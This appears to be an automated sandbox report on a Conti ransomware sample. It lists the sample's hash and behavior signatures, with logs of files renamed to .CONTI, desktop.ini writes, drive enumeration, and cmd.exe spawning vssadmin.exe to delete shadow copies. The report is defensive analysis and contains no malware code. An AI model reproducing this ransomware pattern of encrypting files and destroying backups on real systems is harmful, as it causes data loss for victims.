Malware Analysis Report

2024-10-24 18:32

Sample ID 210928-let12abde8
Target 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample
SHA256 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9
Tags
conti ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9

Threat Level: Known bad

The file 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample was found to be: Known bad.

Malicious Activity Summary

conti ransomware

Conti Ransomware

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Drops desktop.ini file(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-28 09:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-28 09:27

Reported

2021-09-28 09:29

Platform

win7-en-20210920

Max time kernel

77s

Max time network

23s

Command Line

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ShowUnprotect.crw => C:\Users\Admin\Pictures\ShowUnprotect.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1512 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1512 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1512 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1140 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1140 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1140 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 656 wrote to memory of 864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 656 wrote to memory of 864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 656 wrote to memory of 864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 656 wrote to memory of 864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1220 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1220 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1220 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1648 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1648 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1648 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1960 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1960 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1960 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1492 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1492 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1492 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1492 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
